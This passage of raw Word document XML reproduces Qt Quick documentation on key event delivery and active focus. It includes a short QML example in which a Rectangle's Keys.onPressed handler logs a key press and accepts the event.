          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2233" w:history="1">
        <w:r w:rsidRPr="009B5FE9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000966E4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the active window</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the key event is delivered to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The key event is </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delivered by the scene to the</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2234" w:history="1">
        <w:r w:rsidRPr="009B5FE9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>active focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If no item</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has active focus, the key event is ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2235" w:history="1">
        <w:r w:rsidRPr="009B5FE9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with active focus accepts the key event</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, propagation stops. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Otherwise the event is sent to the Item's parent</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> until the event is accepted, or the root item is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If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Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type in the following </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has active focus and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A</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key is pressed, the event will not be propagated further. Upon pressing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B</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key, the event will propagate to the root item and thus be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle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ind w:left="52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100</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height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100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="52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focus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p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="52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Keys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onPressed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ind w:left="52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Key_A</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ind w:left="52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console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log</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Key A was pressed'</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ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">accepted </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the root</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2236" w:history="1">
        <w:r w:rsidRPr="009B5FE9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is reached, the key event is</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2237" w:anchor="ignore" w:history="1">
        <w:r w:rsidRPr="009B5FE9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ignored</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and regular Qt key handling continues</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See also the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2238" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keys attached property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2239" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>KeyNavigation attached property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="00BC6C9E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1898" w:name="querying-the-active-focus-item"/>
      <w:bookmarkStart w:id="1899" w:name="_Toc483000941"/>
      <w:bookmarkStart w:id="1900" w:name="_Toc483003932"/>
      <w:bookmarkStart w:id="1901" w:name="_Toc483604284"/>
      <w:bookmarkStart w:id="1902" w:name="_Toc483605504"/>
      <w:bookmarkEnd w:id="1898"/>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Querying the Active Focus Item</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1899"/>
      <w:bookmarkEnd w:id="1900"/>
      <w:bookmarkEnd w:id="1901"/>
      <w:bookmarkEnd w:id="1902"/>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
